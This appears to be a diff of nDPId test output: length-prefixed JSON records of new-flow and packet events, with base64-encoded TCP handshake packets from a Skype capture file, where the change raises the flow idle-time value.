-00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1850,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1431970697522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970697522,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJ8VAAEAGrFLAqAEiUHlUXchsAbvYtBS\/AAAAALAC\/\/9fxAAAAgQFtAEDAwUBAQgKPjJ6ygAAAAAEAgAA"} 
-00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1870,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":1431970697921,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970697921,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXadAAEAGdnDAqAEiUHlUXchq861iaxDLAAAAALAC\/\/\/mhAAAAgQFtAEDAwUBAQgKPjJ8VgAAAAAEAgAA"} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1878,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":1431970698527,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970698527,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIalAAEAGsm7AqAEiUHlUXchsAbvYtBS\/AAAAALAC\/\/9b2wAAAgQFtAEDAwUBAQgKPjJ+swAAAAAEAgAA"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970698661,"flow_last_seen":1431970698661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970698661,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51309,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1431970698661,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970698661,"pkt":"0NQSxnP1PBXCt3IOCABFAABAL8NAAEAGlA7AqAEilQ0gD8htNFBZKlAPAAAAALAC\/\/9ctAAAAgQFtAEDAwUBAQgKPjJ\/OAAAAAAEAgAA"} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1883,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":2,"flow_last_seen":1431970698714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970698714,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyG0MzUGLWSpQEKASOJAD+QAAAgQFrAQCCAo\/iaNBPjJ\/OAEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1884,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":3,"flow_last_seen":1431970698714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970698714,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0OGtAAEAGi3LAqAEilQ0gD8htNFBZKlAQDM1BjIAQECxa7wAAAQEICj4yf2w\/iaNB"} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1896,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":3,"flow_last_seen":1431970699535,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970699535,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1tBAAEAG\/UbAqAEiUHlUXchsAbvYtBS\/AAAAALAC\/\/9X8gAAAgQFtAEDAwUBAQgKPjKCnAAAAAAEAgAA"} 
-00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1905,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970699896,"flow_last_seen":1431970699896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970699896,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51311,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1905,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1431970699896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970699896,"pkt":"0NQSxnP1PBXCt3IOCABFAABAq+JAAEAGjwvAqAEiXU\/gsMhvOKrhhkW1AAAAALAC\/\/9MqQAAAgQFtAEDAwUBAQgKPjKEAQAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1907,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":2,"flow_last_seen":1431970699988,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970699988,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGRPJdT+CwwKgBIjiqyG99aSIL4YZFtqASOJC3HAAAAgQFrAQCCAoANM5PPjKEAQEDAwU="} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1908,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":3,"flow_last_seen":1431970699988,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970699988,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MxRAAEAGB+bAqAEiXU\/gsMhvOKrhhkW2fWkiDIAQECwN6AAAAQEICj4yhFwANM5P"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1917,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970700273,"flow_last_seen":1431970700273,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970700273,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1917,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1431970700273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970700273,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXG9AAEAGZ2LAqAEilQ0gD8hwNFCdm737AAAAALAC\/\/+kFAAAAgQFtAEDAwUBAQgKPjKFdwAAAAAEAgAA"} 
-00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1920,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":2,"flow_last_seen":1431970700316,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970700316,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyHC8tiDYnZu9\/KASOJDXAgAAAgQFrAQCCAo\/i4hfPjKFdwEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1921,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":3,"flow_last_seen":1431970700316,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970700316,"pkt":"0NQSxnP1PBXCt3IOCABFAAA08VdAAEAG0oXAqAEilQ0gD8hwNFCdm738vLYg2YAQECwuAwAAAQEICj4yhaE\/i4hf"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1957,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970701461,"flow_last_seen":1431970701461,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970701461,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51313,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1957,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1431970701461,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970701461,"pkt":"0NQSxnP1PBXCt3IOCABFAABABNpAAEAGl07AqAEi1KEIJMhxNFBceQzyAAAAALAC\/\/9qAAAAAgQFtAEDAwUBAQgKPjKKDQAAAAAEAgAA"} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1958,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970701508,"flow_last_seen":1431970701508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970701508,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51314,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1958,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1431970701508,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970701508,"pkt":"0NQSxnP1PBXCt3IOCABFAABA+6xAAEAGP0HAqAEiXU\/gsMhyOKrDZAILAAAAALAC\/\/+oNwAAAgQFtAEDAwUBAQgKPjKKPAAAAAAEAgAA"} 
-00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1959,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":2,"flow_last_seen":1431970701535,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970701535,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQyHGqbrB+XHkM86ASOJCJjwAAAgQFrAQCCAo\/pB5HPjKKDQEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1960,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":3,"flow_last_seen":1431970701535,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970701535,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0GjJAAEAGggLAqAEi1KEIJMhxNFBceQzzqm6wf4AQECzgbwAAAQEICj4yilc\/pB5H"} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1965,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":2,"flow_last_seen":1431970701599,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970701599,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGRPJdT+CwwKgBIjiqyHKomFMrw2QCDKASOJC0yAAAAgQFrAQCCAoANM\/iPjKKPAEDAwU="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1966,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":3,"flow_last_seen":1431970701599,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970701599,"pkt":"0NQSxnP1PBXCt3IOCABFAAA03YRAAEAGXXXAqAEiXU\/gsMhyOKrDZAIMqJhTLIAQECwLlgAAAQEICj4yipUANM\/i"} 
-00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970703073,"flow_last_seen":1431970703073,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970703073,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1431970703073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970703073,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2zBAAEAGwPfAqAEi1KEIJMhzNFD26tn9AAAAALAC\/\/\/8RgAAAgQFtAEDAwUBAQgKPjKQRwAAAAAEAgAA"} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2017,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":2,"flow_last_seen":1431970703145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970703145,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQyHPVGwsc9urZ\/qASOJBaugAAAgQFrAQCCAo\/nFogPjKQRwEDAwk="} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2018,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":3,"flow_last_seen":1431970703145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970703145,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0QUdAAEAGWu3AqAEi1KEIJMhzNFD26tn+1RsLHYAQECyxnAAAAQEICj4ykI8\/nFog"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2056,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970704329,"flow_last_seen":1431970704329,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970704329,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51316,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2056,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1431970704329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970704329,"pkt":"0NQSxnP1PBXCt3IOCABFAABAHThAAEAGppnAqAEilQ0gD8h0NFB7qA8CAAAAALAC\/\/9lUQAAAgQFtAEDAwUBAQgKPjKVIwAAAAAEAgAA"} 
-00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2057,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":2,"flow_last_seen":1431970704371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970704371,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyHQNAtU7e6gPA6ASOJA1ewAAAgQFrAQCCAo\/gOZ\/PjKVIwEDAwk="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2058,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":3,"flow_last_seen":1431970704371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970704371,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+SJAAEAGyrrAqAEilQ0gD8h0NFB7qA8DDQLVPIAQECyMewAAAQEICj4ylU0\/gOZ\/"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970705942,"flow_last_seen":1431970705942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970705942,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1431970705942,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970705942,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIgJAAEAGoc\/AqAEilQ0gD8h1NFDRK91BAAAAALAC\/\/87SwAAAgQFtAEDAwUBAQgKPjKbZQAAAAAEAgAA"} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2082,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":2,"flow_last_seen":1431970705984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970705984,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyHXO868x0SvdQqASOJBt+QAAAgQFrAQCCAo\/gOgTPjKbZQEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2083,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":3,"flow_last_seen":1431970705984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970705984,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0iDxAAEAGO6HAqAEilQ0gD8h1NFDRK91CzvOvMoAQECzE+QAAAQEICj4ym48\/gOgT"} 
-00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2116,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970707102,"flow_last_seen":1431970707102,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970707102,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51318,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2116,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1431970707102,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970707102,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/2lAAEAGnL7AqAEi1KEIJMh2NFCv5GiXAAAAALAC\/\/+lEAAAAgQFtAEDAwUBAQgKPjKf5wAAAAAEAgAA"} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2117,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":2,"flow_last_seen":1431970707176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970707176,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQyHapD3vnr+RomKASOJCFFQAAAgQFrAQCCAo\/p5PEPjKf5wEDAwk="} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2118,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":3,"flow_last_seen":1431970707176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970707176,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0qAZAAEAG9C3AqAEi1KEIJMh2NFCv5GiYqQ976IAQECzb9gAAAQEICj4yoDA\/p5PE"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1847,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970697478,"flow_last_seen":1431970697478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970697478,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1847,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1431970697478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970697478,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/r1AAEAGxRPAqAEilQ0gD8hrNFBkkG+ZAAAAALAC\/\/82XwAAAgQFtAEDAwUBAQgKPjJ6nwAAAAAEAgAA"} 
+00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1848,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":2,"flow_last_seen":1431970697521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970697521,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyGvw2U4ZZJBvmqASOJDuMgAAAgQFrAQCCAo\/iaIXPjJ6nwEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1849,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":3,"flow_last_seen":1431970697522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970697522,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05GtAAEAG33HAqAEilQ0gD8hrNFBkkG+a8NlOGoAQECxFMgAAAQEICj4yeso\/iaIX"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1850,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970697522,"flow_last_seen":1431970697522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970697522,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1850,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1431970697522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970697522,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJ8VAAEAGrFLAqAEiUHlUXchsAbvYtBS\/AAAAALAC\/\/9fxAAAAgQFtAEDAwUBAQgKPjJ6ygAAAAAEAgAA"} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1870,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":1431970697921,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970697921,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXadAAEAGdnDAqAEiUHlUXchq861iaxDLAAAAALAC\/\/\/mhAAAAgQFtAEDAwUBAQgKPjJ8VgAAAAAEAgAA"} 